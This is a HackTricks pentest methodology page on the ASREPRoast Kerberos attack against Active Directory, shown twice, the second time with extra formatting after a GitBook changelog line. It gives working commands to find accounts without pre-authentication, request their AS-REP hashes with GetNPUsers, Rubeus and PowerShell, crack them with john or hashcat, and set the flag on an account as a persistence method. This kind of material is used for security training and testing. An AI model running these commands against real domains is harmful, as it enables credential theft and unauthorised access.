hacktricks/windows/active-directory-methodology/asreproast.md

# ASREPRoast

## ASREPRoast

The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute \(**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**\)**_.

That means that anyone can send an AS\_REQ request to the DC on behalf of any of those users, and receive an AS\_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**.

#### Enumerating vulnerable users \(need domain credentials\)

```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
```

#### Request AS\_REP message

{% code title="Using Linux" %}
```bash
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
```
{% endcode %}

{% code title="Using Windows" %}
```bash
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}

### Cracking

```text
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
```

### Persistence

Force **preauth** not required for a user where you have **GenericAll** permissions \(or permissions to write properties\):

```bash
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```

\*\*\*\*[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)\*\*\*\*
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 17:43:14 +02:00			`# ASREPRoast`

			`## ASREPRoast`

			`The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute \([_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_\)_.`

			`That means that anyone can send an AS\_REQ request to the DC on behalf of any of those users, and receive an AS\_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.`

			`Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.`

			`#### Enumerating vulnerable users \(need domain credentials\)`

			```bash
			`Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView`
			```

			`#### Request AS\_REP message`

			`{% code title="Using Linux" %}`
			```bash
			`#Try all the usernames in usernames.txt`
			`python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast`
			`#Use domain creds to extract targets and target them`
			`python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast`
			```
			`{% endcode %}`

			`{% code title="Using Windows" %}`
			```bash
			`.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast`
			`Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)`
			```
			`{% endcode %}`

			`### Cracking`

			```text
			`john --wordlist=passwords_kerb.txt hashes.asreproast`
			`hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt`
			```

			`### Persistence`

			`Force preauth not required for a user where you have GenericAll permissions \(or permissions to write properties\):`

			```bash
			`Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose`
			```

			`\\\\[More information about AS-RRP Roasting in ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)\\\\`